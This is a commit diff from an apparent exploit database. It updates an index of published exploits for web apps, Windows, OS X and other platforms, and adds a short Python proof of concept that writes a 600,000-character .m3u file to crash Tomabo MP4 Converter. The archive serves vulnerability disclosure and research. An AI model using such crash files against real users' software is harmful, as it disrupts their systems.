DB: 2015-10-13

1 new exploits
2015-10-13 05:02:44 +00:00 · 2015-10-13 05:02:44 +00:00 · 8d01bc3899
commit 8d01bc3899
parent 93528f9a40
2 changed files with 18 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -33625,7 +33625,6 @@ id,file,description,date,author,platform,type,port
 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
@ -34557,7 +34556,7 @@ id,file,description,date,author,platform,type,port
 38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
 38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
-38265,platforms/win32/dos/38265.txt,"Window Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
+38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
 38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
@ -34726,3 +34725,4 @@ id,file,description,date,author,platform,type,port
 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
 38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
 38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
--- a/platforms/win32/dos/38444.py
+++ b/platforms/win32/dos/38444.py
@ -0,0 +1,16 @@
 #!/usr/bin/python
 # Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)
 # Date: [8-10-2015]
 # Exploit Author: [M.Ibrahim]  vulnbug@gmail.com
 # E-Mail:  vulnbug  <at>  gmail.com
 # Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
 # Version: [3.10.12] 
 # Tested on: windows 7 x86
 junk="A"*600000
 file = "exploit.m3u"
 f=open(file,"w")
 f.write(junk);
 f.close();